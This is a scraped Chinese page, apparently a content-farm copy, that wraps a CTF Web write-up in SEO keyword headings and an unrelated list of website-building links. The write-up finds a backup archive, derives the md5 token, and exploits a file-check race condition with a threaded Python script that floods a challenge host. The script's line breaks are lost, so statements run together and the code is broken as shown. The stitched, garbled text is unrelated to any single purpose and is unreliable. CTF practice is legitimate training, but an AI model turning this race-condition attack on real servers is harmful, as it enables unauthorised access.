当前位置: 首页 > news >正文

点图片跳到网站怎么做罗湖网站建设

点图片跳到网站怎么做,罗湖网站建设,凡客诚品v十商城,长沙seo步骤0x00 前言 CTF 加解密合集CTF Web合集 0x01 题目 0x02 Write Up 首先跑一下字典,这里用的dirmap,可以看到有一个web.zip 下载下来之后发现是一个网站备份,备份的是check.php.bak 然后接着看,可以看到这里不太可能是sql注入,有…

0x00 前言

  • CTF 加解密合集
  • CTF Web合集

0x01 题目

在这里插入图片描述

0x02 Write Up

首先跑一下字典,这里用的dirmap,可以看到有一个web.zip

在这里插入图片描述
下载下来之后发现是一个网站备份,备份的是check.php.bak

然后接着看,可以看到这里不太可能是sql注入,有一个请求 check.php?token="+token+"&php://input"

在这里插入图片描述
正好接着上一个文件备份的内容,看一下源码

在这里插入图片描述
首先token是将date("i")进行md5,然后就是文件md5对比,要求md5一致,但是sha512不一样,这里比较的文件是key.dat

直接访问进行下载即可。

原理就是将上传的文件保存为flag.dat,然后进行对比,那么这种情况肯定会出现条件竞争,也就是说flag.dat在比较完第一次之后被覆盖了的话,就可以满足第二个条件

import requests
import time
import hashlib
import threadingi=str(time.localtime().tm_min)
m=hashlib.md5(i.encode()).hexdigest()def go_to(data):try:url=f"http://1babff5a-576a-48b8-9f50-d4feeb5b7cbd.challenge.ctf.show/check.php?token={m}&php://input"s=requests.post(url,data=data)print(s.text)except Exception as e:passwith open('key.dat','rb') as t:data1=t.read()pass
for i in range(20):threading.Thread(target=go_to,args=(data1,)).start()
for i in range(20):data2='abbcd'threading.Thread(target=go_to,args=(data2,)).start()

在这里插入图片描述

以上

http://www.yayakq.cn/news/692043/

相关文章:

  • 网站建设和优化要求柳州旅游网站建设
  • 网站建设与管理拼音seo网站分析报告
  • 北京 顺义 网站制作云南省安宁市建设厅官方网站
  • 电子商务网站建设课设网站新浪云虚拟主机做电影网站
  • 如何利用阿里云做网站51游戏
  • 自助网站建设系统北京网页设计制作
  • 邹城网站建设公司wordpress搭建500错误
  • 诸城易讯网站建设服务中心wordpress 收集
  • 网站建设要懂哪些技术抖音代运营一般几个周期
  • 官方网站怎么注册徐州官方发布
  • 飞凡 做电商网站做个软件需要多少钱
  • wordpress网站做app单位网站建设需要哪些技术
  • 电白区建设局网站wordpress 在线联系
  • 万网网站建设万网网站建设dw怎么切片做网站
  • 课程培训网站建设通过网站赚钱
  • 网站加首页会唐网做网站
  • 阿里云购买网站空间网络公关在哪些方面能发挥作用
  • 部门网站开发个人网站备案简介
  • 装饰公司网站方案链友之家
  • 建立网站定制网站建设运营法律风险防范
  • 网站开发命名规则巨量千川广告投放平台
  • 建站宝盒下载免费的简历制作
  • 企业网站四大类型cd.wordpress.ncn
  • 毕业设计 做网站如何做目录wordpress
  • 邯郸网站建设行情公司装修孕妇怎么办
  • 换个网站对seo有什么影响网页设计模板与效果图
  • 北京交通管制信息网站小说短篇做的好的网站
  • 石家庄网站优化多少钱中小企业网站建设服务
  • 建设工程信息发布网站微信分销系统软件开发
  • 福建省住房和城乡建设部网站新网网站备案流程